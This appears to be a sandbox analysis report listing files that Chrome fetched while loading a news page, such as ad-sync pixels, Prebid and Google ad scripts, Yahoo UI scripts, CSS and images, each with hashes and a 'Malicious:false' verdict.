                                                                                                                                                                                                                  SHA-512:D569869AC96D97C976E977028FFEBCF4D9D95EAB4CBD7B3025B7DB53B900A1958AB695641B90AC44CA3C9DB42F55533E2D6341A8131AA118F2853D393B31AE4D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://ads.yieldmo.com/pbcas?us_privacy=1YNN&gdpr=0&gdpr_consent=&type=iframe
                                                                                                                                                                                                                  Preview:<html>.<body>.<img src="https://pixel-eu.rubiconproject.com/exchange/sync.php?p=yieldmo" style="display: none;" border="0" height="1" width="1">.<img src="https://sync.1rx.io/usersync2/rmpssp?sub=yieldmo&redir%3Dhttps%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dunl%26id%3D%5BRX_UUID%5D" style="display: none;" border="0" height="1" width="1">.<img src="https://bh.contextweb.com/bh/rtset?pid=561118&ev=1&rurl=https%3a%2f%2fads.yieldmo.com/v000/sync?userid=%%VGUID%%&pn_id=pp&gdpr=0&gdpr_consent=&gpp=&gpp_sid=&us_privacy=" style="display: none;" border="0" height="1" width="1">.<img src="https://cm.g.doubleclick.net/pixel?google_nid=yieldmo_dbm&google_hm=VmVjcUlJSTAwSElQX2EzMkxkSko=" style="display: none;" border="0" height="1" width="1">.<img src="https://pixel.tapad.com/idsync/ex/receive?partner_id=3107&partner_device_id=VecqIII00HIP_a32LdJJ" style="display: none;" border="0" height="1" width="1">.</body>.</html>
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):131426
                                                                                                                                                                                                                  Entropy (8bit):5.532269274820635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:ADEDA00954496294EFD2842D62BD2E19
                                                                                                                                                                                                                  SHA1:BF13DC1617E16C8D77DAC28F958F715676BD6ED3
                                                                                                                                                                                                                  SHA-256:648F75C0A040DFE88DBD736C6C05F89BCC0F509C3D21BD5E2DDCD813E657A94B
                                                                                                                                                                                                                  SHA-512:0240A7A6059A1044524880B48D8A2934504E7620371B5111E4AAB71C35B5C760FE6C4EE41C9D5A2C4960305D0C4D6F600B32395C9864C0F22587E1AD34DE0366
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"culture","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a0W00000HBPoVQAX;revsp:usa_today_news_641;lpstaid:7aae058d-8696-37ea-9364-e2b603b82437;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"School_bus;Dulzura,_userfornia;U.S._Customs_and_Border_Protection;Superintendent_%28education%29;userfornia;Transit_bus;San_Diego;USA_Today;Southern_userfornia;School_district\" ctopid=\"1996000\" hashtag=\"1996000\" rs=\"lmsid:a0a0W00000HBPoVQAX;revsp:usa_today_news_641;lpstaid:7aae058d-8696-37ea-9364-e2b603b82437;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=woman-met-group-migrants-school-091146294","canonicalSite":"news","canonicalUrl":"https://www.usatoday.com/story/news/investigations/2024/10/04/san-diego-school-bus-hijacking-fact-check/75477299007/","cat
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                                                                  Entropy (8bit):4.256306466575051
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:631538D4008D6F842DEA6C1086EF1735
                                                                                                                                                                                                                  SHA1:BF7FB2B016029213CCDD07022389F9378D964078
                                                                                                                                                                                                                  SHA-256:5E533CDA6C462E7A158E2E2F371649BA7A970140BCF957976DD72C1CA73FB0D7
                                                                                                                                                                                                                  SHA-512:CE48F607DF4FED664015B63A5A6D674AF0D9B26C022B6A0B421C02A576E13AA9E050B0D31466CD6859FFA09E137CF9CC34BE0FC7C28898B807DF1F2C5F56A9E3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://pa.ybp.yahoo.com/.well-known/interest-group/permissions/?origin=https%3A%2F%2Fgps-aa.ybp.yahoo.com
                                                                                                                                                                                                                  Preview:{. "joinAdInterestGroup": true,. "leaveAdInterestGroup": true.}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1419), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                  Entropy (8bit):5.290554482292794
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5043A481C515B36358C32B8EA2D581FE
                                                                                                                                                                                                                  SHA1:62F528373DD9070C4EC46F5FD53C75BEBF33C985
                                                                                                                                                                                                                  SHA-256:77D1A2D51CE7CD15E6B10DECCC9D34C6BBFB316352F9B3896003DD007B66A920
                                                                                                                                                                                                                  SHA-512:787A6FFDC12314DE3E2E6BCAAB924E5C4D505F526EDAE3C48E9AC384466C272312BE57B3B9FA57856A8348F68A15B17495AF289E5277EBE3884B788AD11E1E77
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/js/react-wafer-games.custom.modern.5043a481c515b36358c32b8ea2d581fe.js
                                                                                                                                                                                                                  Preview:const LOCAL_STORAGE_VARIABLE_NAME="ngyRecentlyPlayedGames",MAX_AMOUNT_OF_GAMES_IN_RECENTLY_PLAYED=2,cleanPath=e=>e.replace("/games/play/","").replace(/\/$/,""),idHeyYahoo="hey yahoo",init=()=>{const{wafer:e}=window,{localStorage:t}=e.features;let a=null;function n(t){let a,n,l;t[0]&&(a=t[0].path,l=`${a}`),t[1]&&(n=t[1].path,l=`${a},${n}`),e.state={recentlyPlayedGames:l,recentlyPlayedGamesUpdateTime:Date.now()}}(()=>{if(a=document.getElementsByClassName("react-wafer-games")[0],a){let l,i=!1;if(t&&(window.wafer.utils.bindEvent(a,"click",(e=>{const{target:a}=e,l=a.getAttribute("data-id");let i=a.getAttribute("data-path");if(l&&i){if(l.toLowerCase()===idHeyYahoo)return;i=cleanPath(i);const e={id:l,path:i};!function(e,a){if(!t)return;let l;e?(l=JSON.parse(e),l=l.filter((e=>e.id!==a.id)),l.length>=2&&l.splice(1),l.unshift(a)):l=[a];window.localStorage.setItem("ngyRecentlyPlayedGames",JSON.stringify(l)),n(l)}(window.localStorage.getItem("ngyRecentlyPlayedGames"),e)}}),{passive:!0}),l=window.l
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3666), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3666
                                                                                                                                                                                                                  Entropy (8bit):5.122712688435668
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9FBA2531FFA6CB0B4D3D34C56C295495
                                                                                                                                                                                                                  SHA1:0EC8BCC9D8F8360CB279D78F88BBEE001AB95D30
                                                                                                                                                                                                                  SHA-256:C6D2343A147111E4F3881E468FACC72DA4582C6AAEFF475D3371DF3FA2576BEE
                                                                                                                                                                                                                  SHA-512:BB6DC985ED5E343DB802BF07F7AF4A92BCB6788AA1F4ACBF61BB49DCFB2926C1E6CF6B1BC31544CBB98BD22D3688D2B220992CD9BED1F2E4FB43ADE8AE33F78E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-bind"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (29565)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):196828
                                                                                                                                                                                                                  Entropy (8bit):5.381362231099202
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:4CE9204E8C673FD1644B5ADBBE64BFB6
                                                                                                                                                                                                                  SHA1:E8AF7050155985C72D8DAA16F24F3002ABB158E2
                                                                                                                                                                                                                  SHA-256:166E4B10F8CFD9D515EF06E381BA17D697BD14DC165B09E533491D5AED4CBC2A
                                                                                                                                                                                                                  SHA-512:481612A0C19A12988A5238A1B3B42FC231E828606F8984F8DDA3F289AF366BE05E85A7388D00FC7EF2B4099E201F9AD72D5CC27AAB0E8767EF8B060FDF9086F2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof require&&require;if(!f&&c)return c(i,!0);if(u)return u(i,!0);var a=new Error("Cannot find module '"+i+"'");throw a.code="MODULE_NOT_FOUND",a}var p=n[i]={exports:{}};e[i][0].call(p.exports,function(r){var n=e[i][1][r];return o(n||r)},p,p.exports,r,e,n,t)}return n[i].exports}for(var u="function"==typeof require&&require,i=0;i<t.length;i++)o(t[i]);return o}return r})()({1:[function(require,module,exports){.!function(e,t,n){"use strict";"undefined"!=typeof window&&"function"==typeof define&&define.amd?define(n):"undefined"!=typeof module&&module.exports?module.exports=n():t.exports?t.exports=n():t.Fingerprint2=n()}(0,this,function(){"use strict";var e=function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var n=[0,0,0,0];return n[3]+=e[3]+t[3],n[2]+=n[3]>>>16,n[3]&=65535,n[2]+=e[2]+t[2],n[1]+=n[2]>>>16,n[2]&=65535,n[1]+=e[1]+t[1],n[0]+=n[1]>>>16,n[1]
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 720x408, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):73583
                                                                                                                                                                                                                  Entropy (8bit):7.966255890465546
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:10797C920BCC919F203A79DB404B1630
                                                                                                                                                                                                                  SHA1:8ABCA3777A229C0F187C9B25215DBBBE989C090B
                                                                                                                                                                                                                  SHA-256:F7C2067B3F1DF4514211235FC669316E5DD4D89A357913FDB6AA78C385829DCF
                                                                                                                                                                                                                  SHA-512:BC17A396B99B4AA98A6D43A9B8497251649437A072F931153F08296B44AD88C13723A67AA9DDADC80D717F5A495FD8FD81BE75E277923309302C8BB83D36E49C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............C....................................................................C......................................................................................................................h.........................!..1.AQ.."2aq..B....#3Rr....$4CTb....%&5cst........6DSUeu....'EW...7FGd..v....................................@........................!..1..AQ."#23a.4BRq.....$.C...Sb%5..r.............?.....C8..d.W...@(......P..@(......P..@(......P..@(......P..@(.....8>..;TN\.....X.JQ..:..B...TR......j..3.v...~.G..f-..y.f.5.H.O.~..\.FUh........U.I..G....Z.3\..<`..(Y...... ...c8...f2u.....P..@(......P..@(......P..@(......P..@(......P..@v=*.\.hDu#.T\.*.E.....P..@(......P..@(......P..@(......P..@(......L.2{.*s..;.<.U.I$...Z...)."..=.3....r...J...6.Z.'.....E.Ed.[h..5L....vt.6...@.+..G..|+OWT..~.....="I..B6H.t.l%.c...........$O....dt..L.$.~CAY..kg.X..V.'.......O..6.vf.m6...u*#.j..v.G.Cz{...qTF...f..J....A@(......P..@(......P..@(......P..@(....
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3735), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):3735
                                                                                                                                                                                                                  Entropy (8bit):4.835929595261791
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A03361886464B469ACD3A16CFBD022ED
                                                                                                                                                                                                                  SHA1:85862F5A82AE0389B03270BD74EB632E0D66BE12
                                                                                                                                                                                                                  SHA-256:DF636670DA8B690EF359C8A48A24ABACD6E8BBD27288E38FB2F24EC922895805
                                                                                                                                                                                                                  SHA-512:8AA03B15DE113EE7147A72A83E34E76D7120CD005452F4726B8D61039DE23673AA7A177BB198ADBEDAC64871BA49C5EFD116B9708B84CB0F9E45AE8C48E8C339
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.common.desktop.a03361886464b469acd3a16cfbd022ed.css
                                                                                                                                                                                                                  Preview:@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.weather-card-form:after{background:var(--white);border-bottom:1px solid var(--dirty-seagull);border-right:1px solid var(--dirty-seagull);content:"";height:8px;position:absolute;right:8px;top:-6px;-webkit-transform:rotate(225deg);transform:rotate(225deg);width:8px}#grid-layout .weather-card-form:after,#grid-layout button.wafer-geolocation-denied,#weather-widget-next-gen .weather-card-form:after,.weather-card-form.wafer-form-complete,.weather-card-form.wafer-form-inprogress{display:none}.lockerWeather-card-form .wafer-autocomplete:focus{outline:0}.wafer-autocomplete-list{list-style-type:none;padding:0;margin:0;-webkit-transition:-webkit-transform opacity .3s ease-out;transition:transform opacity .3s ease-out;trans
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x408, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):29102
                                                                                                                                                                                                                  Entropy (8bit):7.992538939892166
                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:50C88E8DC88CF3B172174576E0E2D74C
                                                                                                                                                                                                                  SHA1:19753BFCBBD4EBA2662EBCDAFA5C0EF4C1A7CE46
                                                                                                                                                                                                                  SHA-256:E4F9B753C933D386ACD19E2DDF8B9D49D1F18B47767E08F08AD702C3B258EE46
                                                                                                                                                                                                                  SHA-512:DA8DC67CAE5C52CC23793669430016D9656C7A35339BDDF4CDBE4B0AF474E4B89FA92203FFD6341AA0D3B3942EF75981A7858F4A5899ED4F91D37892C1869296
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/M8c4IE4FJDImLmmTqdLBSQ--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/9158deb0-80d3-11ef-aff9-8435615c4d1a.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.q..WEBPVP8 .q......*....>a,.G$".%'3....M..{..u..&.LJ...b|o.O........M.......?.?..t.....ok.....7.....[...'..._.=.~...................o=..|...S.../._.=...~.{......_.... .........S..._...O.O....x.s?....h.....C.......G....W.........xw............G6...?........O...g<..w.G....z..o...)......N....j}........W...o........{.W.'......<.....Oq/...<..~.......2..%.......X.^.....s./?./..s....Q.Lw..[]..:..K70.^"5... ..@.xi._..;c.iF.^....s.V.#.$...#m....Q.Lw..[]..7_oFA...e.x.63.@<~..z.Q............Kk..GY1.6.mt`(...J...k........qE.(\....s..T..v...d.x.%.......d...d.6..o..m..5..b...L.s..A.C/.Q.....e..x......&.....0..o.d..0.u...l..F...fj>.X'Xk...j <z..`.GN.Bm......N.'..5b.M{...d..... g?5_H.d.......#M_=?2[]..:..,.Q.......Zxp=......+...W...T....6.-..@..-*d?..m..h...KQ./i]6;Q.a.e..S..Y..!.!..wS..:b;#..E..C..axSq.!B.....g3~g.Z.=.y@.mZ[=...7Q.v.tD...}.i.[N.s1.yC..!7.P......b..:.I..)D.W..|...m'.9...w.Zm...c.).9...MC..@.@...eL..u"g;. ..\.&.......y..5P.<:.X`.7..=5fJ6.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                  Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                  SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                  SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                  SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://sync.srv.stackadapt.com/sync?nid=20&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=
                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (58453)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):480211
                                                                                                                                                                                                                  Entropy (8bit):5.420671029193478
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6A00679967A865CFC9351B9984EA1803
                                                                                                                                                                                                                  SHA1:0B07F3CAEBAC5D9D4E2BF707225083FA601F836B
                                                                                                                                                                                                                  SHA-256:CBF97B356916E01073C182A4277C83619973B78D8432C5ED192435B93BB430D1
                                                                                                                                                                                                                  SHA-512:AF89F486782FF9340C639DE091B044A9368AF0DF22C2322264DBDADA17C0B2E216605BF7B46601368EC67671DC2F252FE1C43B9424175C153CE50132FD992F0A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:/* prebid.js v8.51.0.Updated: 2024-10-04.Build: 2.0.32.Modules: consentManagement, consentManagementGpp, consentManagementUsp, criteoBidAdapter, enrichmentFpdModule, gdprEnforcement, gppControl_usnat, gppControl_usstates, gptPreAuction, ixBidAdapter, liveIntentIdSystem, medianetBidAdapter, openxBidAdapter, prebidServerBidAdapter, priceFloors, pubmaticBidAdapter, rtdModule, rubiconBidAdapter, taboolaBidAdapter, tripleliftBidAdapter, ttdBidAdapter, userId, yahooAnalyticsAdapter, yahooPrebidServer, yahooRtdProvider, yahoosspBidAdapter, yieldmoBidAdapter, identityLinkIdSystem, pairIdSystem */.if(window.pbjs&&window.pbjs.libLoaded)try{window.pbjs.getConfig("debug")&&console.warn("Attempted to load a copy of Prebid.js that clashes with the existing 'pbjs' instance. Load aborted.")}catch(e){}else (function(){.(()=>{var r,t={5649:(r,t,e)=>{function n(r,t,e,n,o){for(t=t.split?t.split("."):t,n=0;n<t.length;n++)r=r?r[t[n]]:o;return r===o?e:r}e.d(t,{A:()=>n})},5920:r=>{./*.* @license MIT.* Fun Hoo
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32022)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):107802
                                                                                                                                                                                                                  Entropy (8bit):5.597346152535758
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BD42C549E756DFCD463EFD7029C4D8EB
                                                                                                                                                                                                                  SHA1:B5452C8F69AFF3681324FAAA2380300A2BA94E16
                                                                                                                                                                                                                  SHA-256:F1798B049567AD0520CB5DC6C9E847B6B3B8EC02D65D874495AAAAE300C64E4B
                                                                                                                                                                                                                  SHA-512:6E77FECEF8355A5DBBB83B2FF72BF0EEA06A33915C4590C260DDEFE0B08DE968F67A9C531492897CF2A9C6B0EAD8E411677FC0AA18EADE89377569DB8FA12586
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/tag/js/gpt.js
                                                                                                                                                                                                                  Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):51086
                                                                                                                                                                                                                  Entropy (8bit):5.36333089170413
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:AF551B67310E4C8FC63E60101C77C97F
                                                                                                                                                                                                                  SHA1:B21E368A4F6155D50B56E0C3C0499D5D48CB4840
                                                                                                                                                                                                                  SHA-256:F9C06AD28C759B0F000F55C83EB682C66755C308EEA80E2650906A308F9F9220
                                                                                                                                                                                                                  SHA-512:47A91E029F4EA36D1F4B277833F425ECA70C894A2187DF82F05805F73E9B16D359F4F23E21EBD7D9B342373F2F75326396B14BEF0ED08E0337197707373C9A2D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/ss/analytics-3.54.3.js
                                                                                                                                                                                                                  Preview:!function(){function fe(d){var f={A1S:{log:!0,key:"_a1s"},B:{log:!1},BX:{log:!0,key:"bx"},WV:{log:!0,key:"_wv"},TT:{log:!1},D:{log:!1},_ga:{log:!0,key:"_ga"},yx:{log:!0,key:"_yx"},rxx:{log:!0,key:"_rx"},UNAUTHID:{log:!0,key:"aol_unauth"},_utd:{log:!0,key:"aol_utd",filter:function(e){e=e.match(/((?:\||^))gd#[^\|]+/g)[0].split("#")[1];return 24!==e.length&&console.warn("_utd value may be malformed"),e}},RSP_COOKIE:{log:!0,key:"aol_rsp",filter:function(e){e=e.match(/(?:(\&|^))sn=[^\&]+/g)[0].split("=")[1];return 24!==e.length&&console.warn("RSP_COOKIE value may be malformed"),e}},GUC:{log:!0,key:"_guc"},OTH:{log:!0,key:"_li",filter:function(){return"1"}}},m={},e=(this.getCookieByName=function(e){return m[e]},this.setRxx=function(e){var s=-2,t=(document.domain||"").split("."),l=t.length;function c(e){return"."+t.slice(e).join(".")}function u(){var e=c(s),t="rxx",n=m[t],i=(n||(i=(new Date).getTime()-14383872e5,n=parseInt(Math.random().toString().substring(2)).toString(36)+"."+i.toString(36)
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13914), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):13914
                                                                                                                                                                                                                  Entropy (8bit):5.258346764050396
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:69831B2F7B26BC6DD6321C8DCDE85968
                                                                                                                                                                                                                  SHA1:BE0D47A076698915D827447B210BFFAB24AF3BC7
                                                                                                                                                                                                                  SHA-256:ED22526F9ADCDD172C698E0DFC9FA3EE064A96A27BED3335931C4B2BDDF4EEE9
                                                                                                                                                                                                                  SHA-512:2804AEA752858CBE2020FE5977B1BD4F064026D758ACF19176498F70DB4026604DFFABC9350F61E1022AD405BD46C01080B4F65E579AF6BA1E2C326E356771B0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-lightbox-1.10.6-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-lightbox"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var l=o[n]={i:n,l:!1,exports:{}};return e[n].call(l.exports,l,l.exports,t),l.l=!0,l.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,n){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function n(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurabl
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1179247
                                                                                                                                                                                                                  Entropy (8bit):5.490741795277498
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D63560C1B1DD66E77C0163125859CDF6
                                                                                                                                                                                                                  SHA1:E135F8B21CCF95400A53DD1156A70F5B468BB007
                                                                                                                                                                                                                  SHA-256:A6F0AFFF98B2390633EA7690255A961CC170ADC67C6FD03FFC6DE96332C2A5EA
                                                                                                                                                                                                                  SHA-512:78205B62E1024AA46E8720DE20BF3C05EB403018CA40A61F3749013E6DE8C50E7DA73031C722813327E49CDA36AEDE6183E381F0703F23DA11E8DCBE4FD9D910
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://players.brightcove.net/6415665815001/Q2xCF5Ktx5_default/index.min.js
